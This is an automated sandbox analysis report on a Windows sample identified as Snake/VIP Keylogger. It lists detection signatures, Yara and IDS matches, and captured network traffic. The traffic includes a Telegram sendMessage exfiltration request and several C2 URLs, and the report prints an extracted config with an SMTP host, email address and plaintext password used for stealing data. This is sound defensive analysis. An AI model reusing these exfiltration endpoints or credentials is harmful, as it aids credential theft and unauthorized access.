Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
z1PO7311145.exe

Overview

General Information

Sample name:z1PO7311145.exe
Analysis ID:1528088
MD5:b9a13749cc0659a2076afca8f7474509
SHA1:4cb32e56f1333ee8eb523c442d597bad0faf49b7
SHA256:c8f7435398a1f1de11e2b2385b2bfd92414860fe7394071ba329ad0ee1c22a48
Tags:exeuser-Porcupine
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Machine Learning detection for sample
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • z1PO7311145.exe (PID: 6492 cmdline: "C:\Users\user\Desktop\z1PO7311145.exe" MD5: B9A13749CC0659A2076AFCA8F7474509)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "manoj@electradubai.com", "Password": "LordHaveMercy!!123", "Host": "mail.electradubai.com", "Port": "25", "Version": "4.4"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
z1PO7311145.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    z1PO7311145.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      z1PO7311145.exeJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
        z1PO7311145.exeJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          z1PO7311145.exeWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0x2df5b:$a1: get_encryptedPassword
          • 0x2e278:$a2: get_encryptedUsername
          • 0x2dd6b:$a3: get_timePasswordChanged
          • 0x2de74:$a4: get_passwordField
          • 0x2df71:$a5: set_encryptedPassword
          • 0x2f652:$a7: get_logins
          • 0x2f5b5:$a10: KeyLoggerEventArgs
          • 0x2f21a:$a11: KeyLoggerEventArgsEventHandler
          Click to see the 2 entries

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000000.00000002.3696383781.00000000030B1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
            00000000.00000002.3696383781.0000000002EC1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
              00000000.00000000.1238227546.0000000000B32000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                00000000.00000000.1238227546.0000000000B32000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                  00000000.00000000.1238227546.0000000000B32000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                    Click to see the 5 entries

                    Unpacked PEs

                    SourceRuleDescriptionAuthorStrings
                    0.0.z1PO7311145.exe.b30000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                      0.0.z1PO7311145.exe.b30000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                        0.0.z1PO7311145.exe.b30000.0.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                          0.0.z1PO7311145.exe.b30000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                            0.0.z1PO7311145.exe.b30000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                            • 0x2df5b:$a1: get_encryptedPassword
                            • 0x2e278:$a2: get_encryptedUsername
                            • 0x2dd6b:$a3: get_timePasswordChanged
                            • 0x2de74:$a4: get_passwordField
                            • 0x2df71:$a5: set_encryptedPassword
                            • 0x2f652:$a7: get_logins
                            • 0x2f5b5:$a10: KeyLoggerEventArgs
                            • 0x2f21a:$a11: KeyLoggerEventArgsEventHandler
                            Click to see the 2 entries

                            Sigma Signatures

                            System Summary

                            barindex
                            Sigma detected: Suspicious Outbound SMTP Connections
                            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 192.250.231.25, DestinationIsIpv6: false, DestinationPort: 25, EventID: 3, Image: C:\Users\user\Desktop\z1PO7311145.exe, Initiated: true, ProcessId: 6492, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49770

                            Suricata Signatures

                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-10-07T15:32:12.024708+020028033053Unknown Traffic192.168.2.749701188.114.97.3443TCP
                            2024-10-07T15:32:15.878264+020028033053Unknown Traffic192.168.2.749707188.114.97.3443TCP
                            2024-10-07T15:32:17.084831+020028033053Unknown Traffic192.168.2.749709188.114.97.3443TCP
                            2024-10-07T15:32:18.238750+020028033053Unknown Traffic192.168.2.749711188.114.97.3443TCP
                            2024-10-07T15:32:19.662001+020028033053Unknown Traffic192.168.2.749713188.114.97.3443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-10-07T15:32:10.619499+020028032742Potentially Bad Traffic192.168.2.749699158.101.44.24280TCP
                            2024-10-07T15:32:11.463421+020028032742Potentially Bad Traffic192.168.2.749699158.101.44.24280TCP
                            2024-10-07T15:32:12.635105+020028032742Potentially Bad Traffic192.168.2.749702158.101.44.24280TCP
                            2024-10-07T15:32:13.791372+020028032742Potentially Bad Traffic192.168.2.749704158.101.44.24280TCP
                            2024-10-07T15:32:14.947634+020028032742Potentially Bad Traffic192.168.2.749706158.101.44.24280TCP

                            Joe Sandbox Signatures

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Antivirus / Scanner detection for submitted sample
                            Source: z1PO7311145.exeAvira: detected
                            Antivirus detection for URL or domain
                            Source: http://aborters.duckdns.org:8081URL Reputation: Label: malware
                            Source: http://anotherarmy.dns.army:8081URL Reputation: Label: malware
                            Found malware configuration
                            Source: 0.0.z1PO7311145.exe.b30000.0.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "manoj@electradubai.com", "Password": "LordHaveMercy!!123", "Host": "mail.electradubai.com", "Port": "25", "Version": "4.4"}
                            Multi AV Scanner detection for submitted file
                            Source: z1PO7311145.exeReversingLabs: Detection: 73%
                            AI detected suspicious sample
                            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                            Machine Learning detection for sample
                            Source: z1PO7311145.exeJoe Sandbox ML: detected

                            Location Tracking

                            barindex
                            Tries to detect the country of the analysis system (by using the IP)
                            Source: unknownDNS query: name: reallyfreegeoip.org
                            Source: z1PO7311145.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49700 version: TLS 1.0
                            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49722 version: TLS 1.2
                            Source: z1PO7311145.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 4x nop then jmp 02DAF45Dh0_2_02DAF2C0
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 4x nop then jmp 02DAF45Dh0_2_02DAF4AC
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 4x nop then jmp 02DAF45Dh0_2_02DAF52F
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 4x nop then jmp 02DAFC19h0_2_02DAF961
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 4x nop then jmp 06B3E0A9h0_2_06B3DE00
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 4x nop then jmp 06B331E0h0_2_06B32DC8
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 4x nop then jmp 06B30D0Dh0_2_06B30B30
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 4x nop then jmp 06B31697h0_2_06B30B30
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 4x nop then jmp 06B32C19h0_2_06B32968
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 4x nop then jmp 06B3E959h0_2_06B3E6B0
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 4x nop then jmp 06B3F209h0_2_06B3EF60
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 4x nop then jmp 06B3CF49h0_2_06B3CCA0
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 4x nop then jmp 06B331E0h0_2_06B32DC2
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 4x nop then jmp 06B3D7F9h0_2_06B3D550
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 4x nop then jmp 06B3E501h0_2_06B3E258
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 4x nop then jmp 06B3F661h0_2_06B3F3B8
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 4x nop then jmp 06B3EDB1h0_2_06B3EB08
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 4x nop then jmp 06B3D3A1h0_2_06B3D0F8
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 4x nop then jmp 06B3FAB9h0_2_06B3F810
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h0_2_06B30040
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 4x nop then jmp 06B3DC51h0_2_06B3D9A8
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 4x nop then jmp 06B331E0h0_2_06B3310E

                            Networking

                            barindex
                            Uses the Telegram API (likely for C&C communication)
                            Source: unknownDNS query: name: api.telegram.org
                            Yara detected Generic Downloader
                            Source: Yara matchFile source: z1PO7311145.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.z1PO7311145.exe.b30000.0.unpack, type: UNPACKEDPE
                            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841675%0D%0ADate%20and%20Time:%2007/10/2024%20/%2021:27:24%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20841675%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                            Source: Joe Sandbox ViewIP Address: 158.101.44.242 158.101.44.242
                            Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                            Source: Joe Sandbox ViewASN Name: CNSV-LLCUS CNSV-LLCUS
                            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                            Source: unknownDNS query: name: checkip.dyndns.org
                            Source: unknownDNS query: name: reallyfreegeoip.org
                            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49706 -> 158.101.44.242:80
                            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49699 -> 158.101.44.242:80
                            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49702 -> 158.101.44.242:80
                            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49704 -> 158.101.44.242:80
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49711 -> 188.114.97.3:443
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49713 -> 188.114.97.3:443
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49709 -> 188.114.97.3:443
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49701 -> 188.114.97.3:443
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49707 -> 188.114.97.3:443
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49700 version: TLS 1.0
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841675%0D%0ADate%20and%20Time:%2007/10/2024%20/%2021:27:24%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20841675%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                            Source: global trafficDNS traffic detected: DNS query: mail.electradubai.com
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 07 Oct 2024 13:32:23 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            Source: z1PO7311145.exe, 00000000.00000002.3696383781.00000000030B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                            Source: z1PO7311145.exeString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                            Source: z1PO7311145.exeString found in binary or memory: http://aborters.duckdns.org:8081
                            Source: z1PO7311145.exeString found in binary or memory: http://anotherarmy.dns.army:8081
                            Source: z1PO7311145.exe, 00000000.00000002.3696383781.0000000002EC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                            Source: z1PO7311145.exe, 00000000.00000002.3696383781.0000000002EC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                            Source: z1PO7311145.exeString found in binary or memory: http://checkip.dyndns.org/q
                            Source: z1PO7311145.exe, 00000000.00000002.3696383781.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, z1PO7311145.exe, 00000000.00000002.3696383781.00000000030C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.electradubai.com
                            Source: z1PO7311145.exe, 00000000.00000002.3696383781.0000000002EC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: z1PO7311145.exeString found in binary or memory: http://varders.kozow.com:8081
                            Source: z1PO7311145.exe, 00000000.00000002.3697607782.0000000003EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                            Source: z1PO7311145.exe, 00000000.00000002.3696383781.0000000002FA5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                            Source: z1PO7311145.exeString found in binary or memory: https://api.telegram.org/bot
                            Source: z1PO7311145.exe, 00000000.00000002.3696383781.0000000002FA5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                            Source: z1PO7311145.exe, 00000000.00000002.3696383781.0000000002FA5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841675%0D%0ADate%20a
                            Source: z1PO7311145.exe, 00000000.00000002.3697607782.0000000003EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                            Source: z1PO7311145.exe, 00000000.00000002.3697607782.0000000003EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                            Source: z1PO7311145.exe, 00000000.00000002.3697607782.0000000003EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                            Source: z1PO7311145.exe, 00000000.00000002.3696383781.0000000003055000.00000004.00000800.00020000.00000000.sdmp, z1PO7311145.exe, 00000000.00000002.3696383781.0000000003046000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                            Source: z1PO7311145.exe, 00000000.00000002.3696383781.0000000003050000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                            Source: z1PO7311145.exe, 00000000.00000002.3696383781.0000000003046000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enxK
                            Source: z1PO7311145.exe, 00000000.00000002.3697607782.0000000003EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                            Source: z1PO7311145.exe, 00000000.00000002.3697607782.0000000003EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                            Source: z1PO7311145.exe, 00000000.00000002.3697607782.0000000003EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                            Source: z1PO7311145.exe, 00000000.00000002.3696383781.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, z1PO7311145.exe, 00000000.00000002.3696383781.0000000002FA5000.00000004.00000800.00020000.00000000.sdmp, z1PO7311145.exe, 00000000.00000002.3696383781.0000000002F0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                            Source: z1PO7311145.exeString found in binary or memory: https://reallyfreegeoip.org/xml/
                            Source: z1PO7311145.exe, 00000000.00000002.3696383781.0000000002F0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
                            Source: z1PO7311145.exe, 00000000.00000002.3696383781.0000000002F3A000.00000004.00000800.00020000.00000000.sdmp, z1PO7311145.exe, 00000000.00000002.3696383781.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, z1PO7311145.exe, 00000000.00000002.3696383781.0000000002FA5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
                            Source: z1PO7311145.exe, 00000000.00000002.3697607782.0000000003EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                            Source: z1PO7311145.exe, 00000000.00000002.3697607782.0000000003EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                            Source: z1PO7311145.exe, 00000000.00000002.3696383781.0000000003086000.00000004.00000800.00020000.00000000.sdmp, z1PO7311145.exe, 00000000.00000002.3696383781.0000000003077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                            Source: z1PO7311145.exe, 00000000.00000002.3696383781.0000000003081000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                            Source: z1PO7311145.exe, 00000000.00000002.3696383781.0000000003077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/xK
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49722 version: TLS 1.2

                            System Summary

